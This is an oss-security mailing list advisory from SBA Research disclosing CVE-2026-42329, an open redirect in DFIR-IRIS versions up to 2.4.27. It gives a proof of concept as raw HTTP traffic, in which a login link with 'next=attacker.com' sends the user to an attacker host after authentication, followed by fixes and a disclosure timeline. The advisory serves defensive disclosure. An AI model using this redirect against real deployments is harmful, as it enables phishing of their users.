[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0c177f31711249c29fc4ea60240a91f0@sba-research.org>
Date: Tue, 19 May 2026 14:04:46 +0000
From: SBA Research Security Advisory <advisory@...-research.org>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: [SBA-ADV-20260126-02] CVE-2026-42329: DFIR-IRIS before 2.4.28 Open
Redirect
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
# DFIR-IRIS Open Redirect #
Link: https://github.com/sbaresearch/advisories/tree/public/2026/SBA-ADV-20260126-02_DFIR-IRIS_Open_Redirect
## Vulnerability Overview ##
The IRIS web application contains a weakness where an attacker can misuse it
to redirect the user to a malicious website controlled by an attacker.
* **Identifier** : SBA-ADV-20260126-02
* **Type of Vulnerability** : Open Redirect
* **Software/Product Name** : [IRIS](https://www.dfir-iris.org/)
* **Vendor** : [DFIR-IRIS](https://github.com/dfir-iris)
* **Affected Versions** : <= 2.4.27
* **Fixed in Version** : v2.4.28
* **CVE ID** : CVE-2026-42329
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
* **CVSS Base Score** : 4.7 (Medium)
## Vendor Description ##
> IRIS is a collaborative digital platform designed for incident response
> analysts to share complex investigations at a technical level. It can be
> installed on a dedicated server or as a portable application for roaming
> investigations where internet access might not be available.
Source: <https://docs.dfir-iris.org/2.4.24/>
## Impact ##
A user can be sent a trustworthy looking link point to an IRIS deployment,
but after opening it in the browser will get redirected to a malicious
website controlled by the attacker. This facilitates phishing attacks.
## Vulnerability Description ##
Open Redirect vulnerabilities arise when the web application uses some form
of redirects (HTTP Redirects, JavaScript Redirects) and due to insufficient
input validation, an attacker can change the redirect target to a different
(malicious) domain.
## Proof of Concept ##
If a user can be made to open a link to the login page with an added
parameter like `/login?next=attacker.com`, the standard authentication page
is shown to the user:
```http hl:1
GET /login?next=attacker.com HTTP/1.1
Host: myiris.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Jan 2026 13:56:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4932
Connection: keep-alive
Vary: Cookie
Content-Security-Policy: default-src 'self' https://analytics.dfir-iris.org; script-src 'self' 'unsafe-inline' https://analytics.dfir-iris.org; style-src 'self' 'unsafe-inline'; img-src 'self' data:;
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000: includeSubDomains
Front-End-Https: on
<html>
[...]
```
And after a successful authentication, the user gets redirected to the target
website chosen by the attacker:
```http hl:28,42
POST /login?next=attacker.com HTTP/1.1
Host: myiris.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://myiris.local
Referer: https://myiris.local/login?next=attacker.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
csrf_token=IjJlODY3YWI0NjY4MjUwOTJiMzJjYjUzZjkyZWY2ODRmMjlhNDY5NTgi.aWT9qw.Z9vNLn-B_z0Z1xKr4CRGOah-YY8&username=foo&password=bar
HTTP/1.1 302 FOUND
Server: nginx
Date: Mon, 26 Jan 2026 13:57:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 225
Connection: keep-alive
Location: attacker.com?cid=1
Vary: Cookie
Set-Cookie: session=.eJwtTkluwzAM_ErAXl2Aonafe-krDC0karSxA8k5Bfl75TYncgazPWCRxv0L5qPdeYJlrTBDQhJSURxZEzCYbCwbzBE91ahTDAq5emNSUUG5mqsOVYsio4UCKkfIVlCwhOyHK4RKlSSVmBwpMeS9kmy0NVgHpxLnktFzKKOGETWMIffO7X8NDVh6k-XYv3k7CQ7Op2ycC2QxUtZUstUSicUFIxSTcdGG03dvjbdjKakzzA8471-qml7_JvuIhBfc0nXo4E1d3i-f23qs6efywdcdnhPcuF3X3td96zDjBOfCl_52KHj-AjyeYVM.aWT9sA.a7kmSLN_RbLW15uwED81zY-Rd7o; Secure; HttpOnly; Path=/; SameSite=Lax
Content-Security-Policy: default-src 'self' https://analytics.dfir-iris.org; script-src 'self' 'unsafe-inline' https://analytics.dfir-iris.org; style-src 'self' 'unsafe-inline'; img-src 'self' data:;
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000: includeSubDomains
Front-End-Https: on
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="attacker.com?cid=1">attacker.com?cid=1</a>. If not, click the link.
```
## Recommended Countermeasures ##
We recommend updating to IRIS version 2.4.28 or later.
IRIS should apply the following countermeasures:
* If possible, avoid constructing redirect targets that contain user input.
* Otherwise, perform an input validation to make sure that only desired
redirect targets are possible.
## Timeline ##
* `2026-01-26` Identified the vulnerability in version 2.4.26
* `2026-01-30` Initial vendor contact via e-mail
* `2026-02-27` Second vendor contact via e-mail
* `2026-03-30` Report on GitHub due to a missing response from the vendor
* `2026-04-27` Version containing fix (v2.4.28) tagged by vendor
* `2026-04-27` GitHub assigned CVE-2026-42329
* `2026-05-04` Confirm fix for v2.4.28
* `2026-05-19` Public disclosure
## References ##
* OWASP Web Security Testing Guide (WSTG) v4.2. Testing for Client-side URL
Redirect:
<https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect>
* Common Weakness Enumeration. CWE-601 URL Redirection to Untrusted Site
('Open Redirect'): <https://cwe.mitre.org/data/definitions/601.html>
* OpenCRE. CRE: 232-217 Whitelist redirected/forwarded URLs:
<https://opencre.org/cre/232-217>
## Credits ##
* Michael Koppmann ([SBA Research](https://www.sba-research.org/))
* Mathias Tausig ([SBA Research](https://www.sba-research.org/))
The discovery of this vulnerability was made possible through support from
[CYSSDE](https://cyssde.eu/) and the European Union.
-----BEGIN PGP SIGNATURE-----
iQJPBAEBCAA5FiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmoMbfkbFIAAAAAABAAO
bWFudTIsMi41KzEuMTIsMiwxAAoJEPu4hi9Y93WyzZcQALwf8AG9ZkGawqJGGMQK
er5S0KUOPulmqbEVKSRsYAwYsQLb3D/B7Ki/uLxFyAX7myK/w/RwrpQgclUc1vXf
RS5efaV9IFGbNbaps8bZqALFT9USsSQxC3INkaroV8e6ThG8V76+9dBzYqY6BloR
VM8/Am18GTFOz0bY20F9TkVAHcnztxpLYo1FaZ608sSm8WtQtOjn1L7I2skHN/UQ
MTagq/6xf9jBzRBd4IZh2g1lcmQcZdew2KaIFM85n9w58Nz4R1GkA2ciyrIeJOrj
jQq+SmFNI/JREXFjIiIYibk/b9bOWFypkVJIvfJQ6vap9dudpU19LBxfAgQBjbVP
RjhDm3XDKvhVtsqucRRS1ik9fcHxXPzEJBnMbNGuZEjjx3DPXSmNga/zQ55seOrT
8dHju1Yk93S0Qcfbv7dNLcmkU1l1HBw3rg/+zMNHG5FGQBegseUmVpsOLI1s+9LD
QT1gWyFh49dAU/5eUlxAAReqWwAgvHh1dEN0Ji2WHRfv9HpaoC1P6P5M3R2ybaG2
Ma9VZ2IfQbyv4oH46sol6PWDV132qkLe5eGJZP3uKal8qSPdB+Yl3nZr165Tf5Te
I29nA8vOZZYxRIlRLaQjVVCZlyZVlp1Jcs8o9ngoV99q+1zPWoLgrPlsuyvzQO8U
celGFbL4+fIGlxa6afvxUaqn
=49j2
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
